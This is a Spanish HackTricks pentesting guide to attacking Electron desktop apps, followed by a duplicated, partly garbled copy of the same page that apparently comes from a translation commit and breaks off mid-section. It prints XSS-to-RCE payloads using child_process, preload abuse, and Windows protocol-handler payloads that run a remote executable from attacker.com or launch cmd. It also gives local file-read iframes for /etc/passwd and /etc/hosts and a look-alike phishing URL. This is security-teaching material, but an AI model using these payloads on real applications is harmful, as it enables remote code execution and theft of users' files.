hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md

# Aplicaciones de escritorio de Electron

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Introducción

Electron está **basado en Chromium**, pero no es un navegador. No se implementan ciertos principios y mecanismos de seguridad que se encuentran en los navegadores modernos.\
Podrías ver Electron como una aplicación local de backend+frontend donde **NodeJS** es el **backend** y **chromium** es el **frontend**.

Por lo general, es posible encontrar el código de la aplicación de Electron dentro de un archivo `.asar`, para obtener el código es necesario extraerlo:
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
```
En el código fuente de una aplicación Electron, dentro de `packet.json`, puedes encontrar especificado el archivo `main.js` donde se establecen las configuraciones de seguridad.
```json
{
"name": "standard-notes",
"main": "./app/index.js",
```
Electron tiene 2 tipos de procesos:

* Proceso principal (tiene acceso completo a NodeJS)
* Proceso de renderizado (debe tener acceso restringido a NodeJS por razones de seguridad)

![](<../../../.gitbook/assets/image (307) (5) (1).png>)

Un **proceso de renderizado** será una ventana del navegador que carga un archivo:
```javascript
const {BrowserWindow} = require('electron');
let win = new BrowserWindow();

//Open Renderer Process
win.loadURL(`file://path/to/index.html`);
```
La configuración del **proceso de renderizado** se puede **configurar** en el **proceso principal** dentro del archivo main.js. Algunas de las configuraciones **evitarán que la aplicación Electron tenga RCE** u otras vulnerabilidades si las **configuraciones están correctamente configuradas**.

La aplicación de escritorio puede tener acceso al dispositivo del usuario a través de las API de Node. Las siguientes dos configuraciones son responsables de proporcionar mecanismos para **evitar que el JavaScript de la aplicación tenga acceso directo al dispositivo del usuario** y a comandos de nivel del sistema.

* **`nodeIntegration`** - está desactivado de forma predeterminada. Si está activado, permite acceder a las funciones de Node desde el proceso de renderizado.
* **`contextIsolation`** - está activado de forma predeterminada. Si está activado, los procesos principal y de renderizado no están aislados.
* **`preload`** - vacío de forma predeterminada.
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - está desactivado de forma predeterminada. Restringirá las acciones que NodeJS puede realizar.
* Integración de Node en Workers
* **`nodeIntegrationInSubframes`** - está desactivado de forma predeterminada.
* Si **`nodeIntegration`** está **habilitado**, esto permitiría el uso de las **API de Node.js** en páginas web que se cargan en iframes dentro de una aplicación Electron.
* Si **`nodeIntegration`** está **deshabilitado**, entonces los preloads se cargarán en el iframe.

Ejemplo de configuración:
```javascript
const mainWindowOptions = {
title: 'Discord',
backgroundColor: getBackgroundColor(),
width: DEFAULT_WIDTH,
height: DEFAULT_HEIGHT,
minWidth: MIN_WIDTH,
minHeight: MIN_HEIGHT,
transparent: false,
frame: false,
resizable: true,
show: isVisible,
webPreferences: {
blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
nodeIntegration: false,
contextIsolation: false,
sandbox: false,
nodeIntegrationInSubFrames: false,
preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
nativeWindowOpen: true,
enableRemoteModule: false,
spellcheck: true
}
};
```
Algunos **cargas RCE** de [aquí](https://7as.es/electron/nodeIntegration\_rce.txt):
```html
Example Payloads (Windows):
<img src=x onerror="alert(require('child_process').execSync('calc').toString());">

Example Payloads (Linux & MacOS):
<img src=x onerror="alert(require('child_process').execSync('gnome-calculator').toString());">
<img src=x onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
<img src=x onerror="alert(require('child_process').execSync('id').toString());">
<img src=x onerror="alert(require('child_process').execSync('ls -l').toString());">
<img src=x onerror="alert(require('child_process').execSync('uname -a').toString());">
```
### Capturar tráfico

Modifica la configuración start-main y agrega el uso de un proxy como:
```javascript
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
```
## Inyección de código local en Electron

Si puedes ejecutar localmente una aplicación de Electron, es posible que puedas hacer que ejecute código JavaScript arbitrario. Verifica cómo hacerlo en:

{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}
[macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
{% endcontent-ref %}

## RCE: XSS + nodeIntegration

Si la opción **nodeIntegration** está configurada en **on**, el JavaScript de una página web puede utilizar fácilmente las funciones de Node.js simplemente llamando a `require()`. Por ejemplo, la forma de ejecutar la aplicación de calculadora en Windows es:
```html
<script>
require('child_process').exec('calc');
// or
top.require('child_process').exec('open /System/Applications/Calculator.app');
</script>
```
<figure><img src="../../../.gitbook/assets/image (5) (4).png" alt=""><figcaption></figcaption></figure>

## RCE: preload

El script indicado en esta configuración se carga antes que otros scripts en el renderizador, por lo que tiene acceso ilimitado a las API de Node:
```javascript
new BrowserWindow{
webPreferences: {
nodeIntegration: false,
preload: _path2.default.join(__dirname, 'perload.js'),
}
});
```
Por lo tanto, el script puede exportar las características de nodo a las páginas:

{% code title="preload.js" %}
```javascript
typeof require === 'function';
window.runCalc = function(){
require('child_process').exec('calc')
};
```
{% code title="index.html" %}
```html
<body>
<script>
typeof require === 'undefined';
runCalc();
</script>
</body>
```
{% endcode %}

{% hint style="info" %}
**Si `contextIsolation` está activado, esto no funcionará**
{% endhint %}

## RCE: XSS + contextIsolation

El _**contextIsolation**_ introduce **contextos separados entre los scripts de la página web y el código interno de JavaScript de Electron** para que la ejecución de JavaScript de cada código no afecte a los demás. Esta es una característica necesaria para eliminar la posibilidad de RCE.

Si los contextos no están aislados, un atacante puede:

1. Ejecutar **JavaScript arbitrario en el renderizador** (XSS o navegación a sitios externos)
2. **Sobrescribir el método incorporado** que se utiliza en el código de precarga o en el código interno de Electron para poseer una función propia
3. **Activar** el uso de la **función sobrescrita**
4. ¿RCE?

Hay 2 lugares donde se pueden sobrescribir los métodos incorporados: en el código de precarga o en el código interno de Electron:

{% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}
[electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)
{% endcontent-ref %}

{% content-ref url="electron-contextisolation-rce-via-electron-internal-code.md" %}
[electron-contextisolation-rce-via-electron-internal-code.md](electron-contextisolation-rce-via-electron-internal-code.md)
{% endcontent-ref %}

{% content-ref url="electron-contextisolation-rce-via-ipc.md" %}
[electron-contextisolation-rce-via-ipc.md](electron-contextisolation-rce-via-ipc.md)
{% endcontent-ref %}

### Bypass del evento de clic

Si se aplican restricciones cuando se hace clic en un enlace, es posible que se pueda evitarlas **haciendo clic con el botón central** en lugar de hacer clic con el botón izquierdo regularmente.
```javascript
window.addEventListener('click', (e) => {
```
## RCE a través de shell.openExternal

Si la aplicación de escritorio de Electron se implementa con la configuración adecuada de `nodeIntegration` y `contextIsolation`, simplemente significa que **no se puede lograr una RCE del lado del cliente al apuntar a scripts de carga previa o código nativo de Electron desde el proceso principal**.

Cada vez que un usuario hace clic en el enlace o abre una nueva ventana, se invocan los siguientes event listeners:

{% code overflow="wrap" %}
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
{% endcode %}

La aplicación de escritorio **sobrescribe estos listeners** para implementar la **lógica de negocio** de la aplicación de escritorio. Durante la creación de nuevas ventanas, la aplicación verifica si el enlace navegado debe abrirse en una ventana o pestaña de la aplicación de escritorio, o si debe abrirse en el navegador web. En nuestro ejemplo, la verificación se implementa con la función `openInternally`, si devuelve `false`, la aplicación asumirá que el enlace debe abrirse en el navegador web utilizando la función `shell.openExternal`.

**Aquí tienes un pseudocódigo simplificado:**

![](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)

![](<../../../.gitbook/assets/image (620).png>)

De acuerdo con las mejores prácticas de seguridad de Electron JS, la función `openExternal` **no debe aceptar contenido no confiable** **porque esto podría llevar a un abuso de RCE utilizando diferentes protocolos** si la aplicación no limita la navegación de los usuarios a través de protocolos como https:// o http://.

Diferentes sistemas operativos admiten diferentes protocolos que podrían desencadenar RCE, para obtener más información sobre ellos, consulta [https://positive.security/blog/url-open-rce](https://positive.security/blog/url-open-rce#windows-10-19042), pero aquí tienes algunos ejemplos para Windows:
```html
<script>
window.open("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")
</script>


<script>
window.open("search-ms:query=malicious_executable.exe&crumb=location:%5C%[5Cattacker.com](<http://5cattacker.com/>)%5Csmb_share%5Ctools&displayname=Important%20update")
</script>


<script>
window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&&%2520%22%22%7D%7D")
</script>
```
Para obtener más información sobre estos ejemplos, consulta [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) y [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)

## Leer archivos internos: XSS + contextIsolation

Si `contextIsolation` se establece en falso, puedes intentar usar \<webview> (similar a \<iframe> pero puede cargar archivos locales) para leer archivos locales y extraerlos: utilizando algo como **\<webview src=”file:///etc/passwd”>\</webview>:**

![](../../../.gitbook/assets/1-u1jdryuwaevwjmf\_f2ttjg.png)

Otra forma de **leer un archivo interno** se encuentra en este [**informe**](https://bugcrowd.com/disclosures/f7ce8504-0152-483b-bbf3-fb9b759f9f89/critical-local-file-read-in-electron-desktop-app):
```html
<br><BR><BR><BR>
<h1>pwn<br>
<iframe onload=j() src="/etc/hosts">xssxsxxsxs</iframe>
<script type="text/javascript">
function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body.innerText)}
</script>
```
## **RCE: XSS + Chromium antiguo**

Si la aplicación utiliza un **chromium** antiguo y existen **vulnerabilidades conocidas** en él, es posible **explotarlo y obtener RCE a través de un XSS**.\
Puedes ver un ejemplo en este **informe**: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)

## **XSS Phishing mediante bypass de regex de URL interna**

Supongamos que encontraste un XSS pero **no puedes activar RCE ni robar archivos internos**, podrías intentar usarlo para **robar credenciales mediante phishing**.

En primer lugar, necesitas saber qué sucede cuando intentas abrir una nueva URL, verificando el código JS en el front-end:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {}                    // opens the custom openInternally function (it is declared below)
```
La llamada a **`openInternally`** decidirá si el **enlace** se abrirá en la **ventana del escritorio** como un enlace perteneciente a la plataforma, **o** si se abrirá en el **navegador como un recurso de terceros**.

En caso de que la **expresión regular** utilizada por la función sea **vulnerable a bypasses** (por ejemplo, al **no escapar los puntos de los subdominios**), un atacante podría abusar del XSS para **abrir una nueva ventana** que se ubicará en la infraestructura del atacante **solicitando credenciales** al usuario:
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
</script>
```
## **Herramientas**

* [**Electronegativity**](https://github.com/doyensec/electronegativity) es una herramienta para identificar configuraciones incorrectas y patrones de seguridad en aplicaciones basadas en Electron.
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) es un complemento de código abierto para VS Code para aplicaciones de Electron que utiliza Electronegativity.
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) para verificar bibliotecas de terceros vulnerables.
* [**Electro.ng**](https://electro.ng/): Necesitas comprarlo.

## Laboratorios

En [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) puedes encontrar un laboratorio para explotar aplicaciones vulnerables de Electron.

Algunos comandos que te ayudarán con el laboratorio:
```bash
# Download apps from these URls
# Vuln to nodeIntegration
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip
# Vuln to contextIsolation via preload script
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip
# Vuln to IPC Rce
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip

# Get inside the electron app and check for vulnerabilities
npm audit

# How to use electronegativity
npm install @doyensec/electronegativity -g
electronegativity -i vulnerable1

# Run an application from source code
npm install -g electron
cd vulnerable1
npm install
npm start
```
## **Referencias**

* [https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028](https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028)
* [https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)
* [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8)
* [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
* [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)
* Más investigaciones y artículos sobre la seguridad de Electron en [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00			`# Aplicaciones de escritorio de Electron`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de Telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`## Introducción`

			`Electron está basado en Chromium, pero no es un navegador. No se implementan ciertos principios y mecanismos de seguridad que se encuentran en los navegadores modernos.\`
			`Podrías ver Electron como una aplicación local de backend+frontend donde NodeJS es el backend y chromium es el frontend.`

			Por lo general, es posible encontrar el código de la aplicación de Electron dentro de un archivo `.asar`, para obtener el código es necesario extraerlo:
			```bash
			`npx asar extract app.asar destfolder #Extract everything`
			`npx asar extract-file app.asar main.js #Extract just a file`
			```
			En el código fuente de una aplicación Electron, dentro de `packet.json`, puedes encontrar especificado el archivo `main.js` donde se establecen las configuraciones de seguridad.
			```json
			`{`
			`"name": "standard-notes",`
			`"main": "./app/index.js",`
			```
			`Electron tiene 2 tipos de procesos:`

			`* Proceso principal (tiene acceso completo a NodeJS)`
			`* Proceso de renderizado (debe tener acceso restringido a NodeJS por razones de seguridad)`

			`![](<../../../.gitbook/assets/image (307) (5) (1).png>)`

			`Un proceso de renderizado será una ventana del navegador que carga un archivo:`
			```javascript
			`const {BrowserWindow} = require('electron');`
			`let win = new BrowserWindow();`

			`//Open Renderer Process`
			win.loadURL(`file://path/to/index.html`);
			```
			`La configuración del proceso de renderizado se puede configurar en el proceso principal dentro del archivo main.js. Algunas de las configuraciones evitarán que la aplicación Electron tenga RCE u otras vulnerabilidades si las configuraciones están correctamente configuradas.`

			`La aplicación de escritorio puede tener acceso al dispositivo del usuario a través de las API de Node. Las siguientes dos configuraciones son responsables de proporcionar mecanismos para evitar que el JavaScript de la aplicación tenga acceso directo al dispositivo del usuario y a comandos de nivel del sistema.`

			* `nodeIntegration` - está desactivado de forma predeterminada. Si está activado, permite acceder a las funciones de Node desde el proceso de renderizado.
			* `contextIsolation` - está activado de forma predeterminada. Si está activado, los procesos principal y de renderizado no están aislados.
			* `preload` - vacío de forma predeterminada.
			* [`sandbox`](https://docs.w3cub.com/electron/api/sandbox-option) - está desactivado de forma predeterminada. Restringirá las acciones que NodeJS puede realizar.
			`* Integración de Node en Workers`
			* `nodeIntegrationInSubframes` - está desactivado de forma predeterminada.
			* Si `nodeIntegration` está habilitado, esto permitiría el uso de las API de Node.js en páginas web que se cargan en iframes dentro de una aplicación Electron.
			* Si `nodeIntegration` está deshabilitado, entonces los preloads se cargarán en el iframe.

			`Ejemplo de configuración:`
			```javascript
			`const mainWindowOptions = {`
			`title: 'Discord',`
			`backgroundColor: getBackgroundColor(),`
			`width: DEFAULT_WIDTH,`
			`height: DEFAULT_HEIGHT,`
			`minWidth: MIN_WIDTH,`
			`minHeight: MIN_HEIGHT,`
			`transparent: false,`
			`frame: false,`
			`resizable: true,`
			`show: isVisible,`
			`webPreferences: {`
			`blinkFeatures: 'EnumerateDevices,AudioOutputDevices',`
			`nodeIntegration: false,`
			`contextIsolation: false,`
			`sandbox: false,`
			`nodeIntegrationInSubFrames: false,`
			`preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),`
			`nativeWindowOpen: true,`
			`enableRemoteModule: false,`
			`spellcheck: true`
			`}`
			`};`
			```
			`Algunos cargas RCE de [aquí](https://7as.es/electron/nodeIntegration\_rce.txt):`
			```html
			`Example Payloads (Windows):`
			`<img src=x onerror="alert(require('child_process').execSync('calc').toString());">`

			`Example Payloads (Linux & MacOS):`
			`<img src=x onerror="alert(require('child_process').execSync('gnome-calculator').toString());">`
			`<img src=x onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">`
			`<img src=x onerror="alert(require('child_process').execSync('id').toString());">`
			`<img src=x onerror="alert(require('child_process').execSync('ls -l').toString());">`
			`<img src=x onerror="alert(require('child_process').execSync('uname -a').toString());">`
			```
			`### Capturar tráfico`

			`Modifica la configuración start-main y agrega el uso de un proxy como:`
			```javascript
			`"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",`
			```
			`## Inyección de código local en Electron`

			`Si puedes ejecutar localmente una aplicación de Electron, es posible que puedas hacer que ejecute código JavaScript arbitrario. Verifica cómo hacerlo en:`

			`{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}`
			`[macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)`
			`{% endcontent-ref %}`

			`## RCE: XSS + nodeIntegration`

			Si la opción nodeIntegration está configurada en on, el JavaScript de una página web puede utilizar fácilmente las funciones de Node.js simplemente llamando a `require()`. Por ejemplo, la forma de ejecutar la aplicación de calculadora en Windows es:
			```html
			`<script>`
			`require('child_process').exec('calc');`
			`// or`
			`top.require('child_process').exec('open /System/Applications/Calculator.app');`
			`</script>`
			```
			`<figure><img src="../../../.gitbook/assets/image (5) (4).png" alt=""><figcaption></figcaption></figure>`

			`## RCE: preload`

			`El script indicado en esta configuración se carga antes que otros scripts en el renderizador, por lo que tiene acceso ilimitado a las API de Node:`
			```javascript
			`new BrowserWindow{`
			`webPreferences: {`
			`nodeIntegration: false,`
			`preload: _path2.default.join(__dirname, 'perload.js'),`
			`}`
			`});`
			```
			`Por lo tanto, el script puede exportar las características de nodo a las páginas:`

			`{% code title="preload.js" %}`
			```javascript
			`typeof require === 'function';`
			`window.runCalc = function(){`
			`require('child_process').exec('calc')`
			`};`
			```
			`{% code title="index.html" %}`
			```html
			`<body>`
			`<script>`
			`typeof require === 'undefined';`
			`runCalc();`
			`</script>`
			`</body>`
			```
			`{% endcode %}`

			`{% hint style="info" %}`
			Si `contextIsolation` está activado, esto no funcionará
			`{% endhint %}`

			`## RCE: XSS + contextIsolation`

			`El _contextIsolation_ introduce contextos separados entre los scripts de la página web y el código interno de JavaScript de Electron para que la ejecución de JavaScript de cada código no afecte a los demás. Esta es una característica necesaria para eliminar la posibilidad de RCE.`

			`Si los contextos no están aislados, un atacante puede:`

			`1. Ejecutar JavaScript arbitrario en el renderizador (XSS o navegación a sitios externos)`
			`2. Sobrescribir el método incorporado que se utiliza en el código de precarga o en el código interno de Electron para poseer una función propia`
			`3. Activar el uso de la función sobrescrita`
			`4. ¿RCE?`

			`Hay 2 lugares donde se pueden sobrescribir los métodos incorporados: en el código de precarga o en el código interno de Electron:`

			`{% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}`
			`[electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)`
			`{% endcontent-ref %}`

			`{% content-ref url="electron-contextisolation-rce-via-electron-internal-code.md" %}`
			`[electron-contextisolation-rce-via-electron-internal-code.md](electron-contextisolation-rce-via-electron-internal-code.md)`
			`{% endcontent-ref %}`

			`{% content-ref url="electron-contextisolation-rce-via-ipc.md" %}`
			`[electron-contextisolation-rce-via-ipc.md](electron-contextisolation-rce-via-ipc.md)`
			`{% endcontent-ref %}`

			`### Bypass del evento de clic`

			`Si se aplican restricciones cuando se hace clic en un enlace, es posible que se pueda evitarlas haciendo clic con el botón central en lugar de hacer clic con el botón izquierdo regularmente.`
			```javascript
			`window.addEventListener('click', (e) => {`
			```
			`## RCE a través de shell.openExternal`

			Si la aplicación de escritorio de Electron se implementa con la configuración adecuada de `nodeIntegration` y `contextIsolation`, simplemente significa que no se puede lograr una RCE del lado del cliente al apuntar a scripts de carga previa o código nativo de Electron desde el proceso principal.

			`Cada vez que un usuario hace clic en el enlace o abre una nueva ventana, se invocan los siguientes event listeners:`

			`{% code overflow="wrap" %}`
			```javascript
			`webContents.on("new-window", function (event, url, disposition, options) {}`
			`webContents.on("will-navigate", function (event, url) {}`
			```
			`{% endcode %}`

			La aplicación de escritorio sobrescribe estos listeners para implementar la lógica de negocio de la aplicación de escritorio. Durante la creación de nuevas ventanas, la aplicación verifica si el enlace navegado debe abrirse en una ventana o pestaña de la aplicación de escritorio, o si debe abrirse en el navegador web. En nuestro ejemplo, la verificación se implementa con la función `openInternally`, si devuelve `false`, la aplicación asumirá que el enlace debe abrirse en el navegador web utilizando la función `shell.openExternal`.

			`Aquí tienes un pseudocódigo simplificado:`

			`![](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)`

			`![](<../../../.gitbook/assets/image (620).png>)`

			De acuerdo con las mejores prácticas de seguridad de Electron JS, la función `openExternal` no debe aceptar contenido no confiable porque esto podría llevar a un abuso de RCE utilizando diferentes protocolos si la aplicación no limita la navegación de los usuarios a través de protocolos como https:// o http://.

			`Diferentes sistemas operativos admiten diferentes protocolos que podrían desencadenar RCE, para obtener más información sobre ellos, consulta [https://positive.security/blog/url-open-rce](https://positive.security/blog/url-open-rce#windows-10-19042), pero aquí tienes algunos ejemplos para Windows:`
			```html
			`<script>`
			`window.open("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")`
			`</script>`


			`<script>`
			`window.open("search-ms:query=malicious_executable.exe&crumb=location:%5C%[5Cattacker.com](<http://5cattacker.com/>)%5Csmb_share%5Ctools&displayname=Important%20update")`
			`</script>`


			`<script>`
			`window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&&%2520%22%22%7D%7D")`
			`</script>`
			```
			`Para obtener más información sobre estos ejemplos, consulta [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) y [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)`

			`## Leer archivos internos: XSS + contextIsolation`

			Si `contextIsolation` se establece en falso, puedes intentar usar \<webview> (similar a \<iframe> pero puede cargar archivos locales) para leer archivos locales y extraerlos: utilizando algo como \<webview src=”file:///etc/passwd”>\</webview>:

			`![](../../../.gitbook/assets/1-u1jdryuwaevwjmf\_f2ttjg.png)`

			`Otra forma de leer un archivo interno se encuentra en este [informe](https://bugcrowd.com/disclosures/f7ce8504-0152-483b-bbf3-fb9b759f9f89/critical-local-file-read-in-electron-desktop-app):`
			```html
			`<br><BR><BR><BR>`
			`<h1>pwn<br>`
			`<iframe onload=j() src="/etc/hosts">xssxsxxsxs</iframe>`
			`<script type="text/javascript">`
			`function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body.innerText)}`
			`</script>`
			```
			`## RCE: XSS + Chromium antiguo`

			`Si la aplicación utiliza un chromium antiguo y existen vulnerabilidades conocidas en él, es posible explotarlo y obtener RCE a través de un XSS.\`
			`Puedes ver un ejemplo en este informe: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)`

			`## XSS Phishing mediante bypass de regex de URL interna`

